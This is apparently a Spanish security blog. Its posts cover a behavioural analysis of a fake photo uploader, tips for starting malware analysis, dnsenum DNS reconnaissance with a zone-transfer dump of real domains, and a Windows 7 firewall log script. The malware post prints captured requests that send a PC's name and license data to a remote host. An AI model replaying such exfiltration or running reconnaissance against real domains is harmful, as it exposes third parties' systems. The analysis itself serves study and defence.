¿Que se esconde detrás del Uploader de fotos?
Hola!
Muy buenas a todos/as!
Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él 
. Esta última vez se trata de un software que simula ser un uploader de fotos. Quería saber como funcionaba el Malware así que preparé mi máquina virtual y lo ejecuté a ver que pasaba.
No solo el Software no funcionaba como Uploader sino, que, además generaba cierta actividad de red.
Las peticiones DNS:
Esto ya me resultó raro, aunque tratandose de Malware.. es normal. Pero entonces observe estas peticiones
Peticiones HTTP:
Al parecer se añade un usuario a una web remota. El usuario es el nombre de mi pc, y la password la licencia de Windows. Es decir, envía a una base de datos remota mi licencia de Windows. Esto no lo había visto ahora, mola.
Quería saber como Robtex si se trataba de un sistema autónomo y había mas hosts cometiendo fraude.
Alojando en Rusia, como no 
!
En la página web existen diferentes directorios, entre ellos:
Este es el Software que se descarga la gente que accede por error a la URI en cuestión
De las conexiones capturadas con Wireshark se puede ver:
GET /home?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent: HardCore Software For : Public
Host: ejemplo.comHTTP/1.1 301 Moved Permanently
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://cantportforward.com/home/?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft
Content-Type: text/html
Content-Length: 413<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF=”%s”>here</A>.<hr />
Powered By <a href=’http://www.litespeedtech.com’>LiteSpeed Web Server</a><br />
<font face=”Verdana, Arial, Helvetica” size=-1>LiteSpeed Technologies is not responsible for administration and contents of this web site!</font></body></html>
GET /home/?action=add&username=MI%20PC&password=ejemplo&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent: Public
Host: ejemplo.com
Connection: Keep-AliveHTTP/1.1 200 OK
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=a8711e0c5081845ef1838155557b3714; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 0
En otro de los directorios,a los que puedes acceder te encuentras con esta página:
Si se observa el código fuente, una vez loqueado puedes hacer las siguientes búsquedas:
<form name='search' method='GET' action='index.php?action=search'> <strong>Search for:</strong> <input type='text' name='query' size='20' value="xp"> In: <select name='in'><option value='0'>Softwares</option> <option value='1'>Sitename</option> <option selected=selected value='2'>Username</option> <option value='3'>Password</option> <option value='4'>PC Name</option> <option value='5'>IP Address</option><option value='6'>Date</option> </select> <input type='submit' value='Search' name='search'> </form>
Parece ser que se confirma mi sospecha de que es una base de datos donde se guardan ordenadores junto con sus licencias.
Para acabar, el panel será vulnerable a SQL Injection? El servidor tendrá alguna vulnerabilidad que pueda ser explotada?
En fin.. seguiremos trabajando en ello
Empezando con el análisis de malware
Hola!
Muy buenas a todos/as!
Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo… jeje.
Los primeros pasos que hice para analizar un malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..
De eso se trata en parte un análisis de comportamiento de Malware. Yo para la gente que quiera empezar lo haría así:
- Tener una máquina virtual Windows en Host-Only, preferiblemente.
- Tener instalado InstallRite en la máquina virtual.
- Tener capturando la actividad de la tarjeta de red con Wireshark
Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.
Si recordamos el artículo de analizando morto, la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:
Y los cambios que hacía en sistema, por ejemplo con InstallRite
Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..
Así que ánimos
Saludos
Pentesting al DNS, dnsenum
Hola!
Muy buenas a todos/as!
“La información es poder”, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.
Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.
dnsenum evalúa:
1) Get the host’s addresse (A record).
2) Get the namservers (threaded).
3) Get the MX record (threaded).
4) Perform axfr queries on nameservers and get BIND versions(threaded).
5) Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7) Calculate C class domain network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9) Write to domain_ips.txt file ip-blocks.
Nos sirve perfectamente para hacer las pruebas que necesitamos.
La herramienta la podemos descargar por SVN de aquí: dnsenum
Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:
Necesarios:
Net::IP
Net::DNS
Net::Netmask
Opcionales:
Net::Whois::IP
HTML::Parser
WWW::Mechanize
XML::Writer
Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.
Host que NO permite trasferencia de zona:
Para lanzar dnsenum
perl dnsenum.pl xubuntu.com
dnsenum.pl VERSION:1.2.2
—– xubuntu.com —–
Host’s addresses:
__________________xubuntu.com 600 IN A 91.189.90.40
xubuntu.com 600 IN A 91.189.90.41
xubuntu.com 600 IN A 91.189.89.88
Name Servers:
______________ns1.canonical.com 147710 IN A 91.189.94.173
ns2.canonical.com 147528 IN A 91.189.94.219
ns3.canonical.com 126351 IN A 209.6.3.210
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for xubuntu.com on ns1.canonical.com …
AXFR record query failed: NOERRORns1.canonical.com Bind Version: 9.7.3
Trying Zone Transfer for xubuntu.com on ns3.canonical.com …
AXFR record query failed: NOERRORns3.canonical.com Bind Version: 9.7.3
Trying Zone Transfer for xubuntu.com on ns2.canonical.com …
AXFR record query failed: NOERRORns2.canonical.com Bind Version: 9.7.3
Wildcards detected, all subdomains will point to the same IP address, bye.
Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.
Hagamos otra comprobación:
perl dnsenum.pl gnu.org
dnsenum.pl VERSION:1.2.2
—– gnu.org —–
Host’s addresses:
__________________gnu.org 300 IN A 140.186.70.148
Name Servers:
______________ns2.gnu.org 300 IN A 87.98.253.102
ns1.gnu.org 300 IN A 140.186.70.164
ns3.gnu.org 300 IN A 46.43.37.70
Mail (MX) Servers:
___________________eggs.gnu.org 300 IN A 140.186.70.92
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for gnu.org on ns2.gnu.org …
gnu.org 300 IN SOA
gnu.org 300 IN A 140.186.70.148
gnu.org 300 IN TXT
gnu.org 300 IN MX
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN SSHFP
alpha.gnu.org 300 IN A 140.186.70.21
anoncvs.gnu.org 300 IN CNAME
arch.gnu.org 300 IN CNAME
audio-video.gnu.org 300 IN CNAME
audio-video-dev.gnu.org 300 IN A 140.186.70.157
audio-video-dev.gnu.org 300 IN SSHFP
autoconfig.gnu.org 300 IN A 140.186.70.30
be.gnu.org 300 IN NS
be.gnu.org 300 IN NS
ftp.be.gnu.org 300 IN CNAME
www.be.gnu.org 300 IN CNAME
beeblebrox.gnu.org 300 IN SSHFP
bugs.gnu.org 300 IN A 140.186.70.43
bzr.gnu.org 300 IN CNAME
catalyst.gnu.org 300 IN SSHFP
chapters.gnu.org 300 IN A 91.121.254.230
front.chapters.gnu.org 300 IN A 91.121.254.230
clock.gnu.org 300 IN CNAME
www.cn.gnu.org 300 IN A 61.152.210.194
cvs.gnu.org 300 IN CNAME
dbd.gnu.org 300 IN A 140.186.70.32
dbd.gnu.org 300 IN SSHFP
debbugs.gnu.org 300 IN A 140.186.70.43
debbugs.gnu.org 300 IN SSHFP
eggs.gnu.org 300 IN A 140.186.70.92
eggs.gnu.org 300 IN SSHFP
elpa.gnu.org 300 IN A 140.186.70.89
elpa.gnu.org 300 IN SSHFP
es.gnu.org 300 IN MX
es.gnu.org 300 IN A 91.121.254.230
bee.es.gnu.org 300 IN CNAME
www.bee.es.gnu.org 300 IN CNAME
bluewall.es.gnu.org 300 IN CNAME
bussiness.es.gnu.org 300 IN CNAME
bw.es.gnu.org 300 IN CNAME
conferencias.es.gnu.org 300 IN CNAME
emacs.es.gnu.org 300 IN CNAME
www.emacs.es.gnu.org 300 IN CNAME
empresas.es.gnu.org 300 IN CNAME
evalhackers.es.gnu.org 300 IN CNAME
ftp.es.gnu.org 300 IN CNAME
ghm.es.gnu.org 300 IN CNAME[...]
Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.
En algún DNS también nos dejan mensajes de los mas curiosos:
perl dnsenum aeat.es
—– aeat.es —–
Host’s addresses:
__________________aeat.es 3176 IN A 195.235.106.193
Name Servers:
______________esifw2.tsai.es 106 IN A 213.4.194.5
esifw1.tsai.es 256 IN A 213.0.43.37
Mail (MX) Servers:
___________________correodeempresas.telefonica.es 300 IN A 212.170.236.87
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for aeat.es on esifw1.tsai.es …
AXFR record query failed: NOERROResifw1.tsai.es Bind Version: :-b
Parece ser que no quieren que miremos la versión 
Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.
Saludos!
Firewall Windows 7 y Cygwin
Hola!
Muy buenas a todos/as!
En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete:
Allow: El paquete mediante una regla preestablecida deja pasar hacia fuera
Drop:Se deniega el paso del paquete y no manda respuesta de ello
Reject:Se deniega el paso de ese paquete, manda un ICMP como destino inalcanzable
El log de Firewall de Wndows 7 es bastante sencillo de interpretar, así que mientras hacía mis pruebas y al mas estilo Unix, con Cygwin me hice un sh para ir comprobando los paquetes. Para activar el LOG en Firewall hemos de ir a la utilidad wf.msc con permisos de administrador.
Si obervamos la imagen tenemos que ir al menú de Propiedades de Firewall
Aqui tenemos los 3 perfiles del firewall, cada perfil se establece en un área de red que heos definido cuando nos conectamos a una red. En el caso de dominio normalmente si trabajas en dominio en una empresa, privado en casa, por ejemplo y público en todo aquel sitio que no conozcas ni sea de tu confianza.
Aunque puede que cada pefil debería d estar configurado de una manera especial, creo que es bueno configurar el Firewall lo mas restringivo posible en todas las áreas, siendo así una medida de mitigación contra posibles ataques del exterior.
En el apartado de inicio de sesión:
Para cada uno de estos dominios, hemos de activar que registre los paquetes descartados y correctos. El log se guarda por defecto en:
/Windows/System32/LogFiles/Firewall/pfirewall.log
Como trabajo mucho con Cygwin, con un simple tail, podríamos ir viendo como se van registrando los paquetes:
#!/bin/bash
#Shell que hace un tail de las conexiones del Firewall
tail -f /cygdrive/c/Windows/System32/LogFiles/Firewall/pfirewall.log
Una utilidad mas por si hay alguien que queire probarlo 
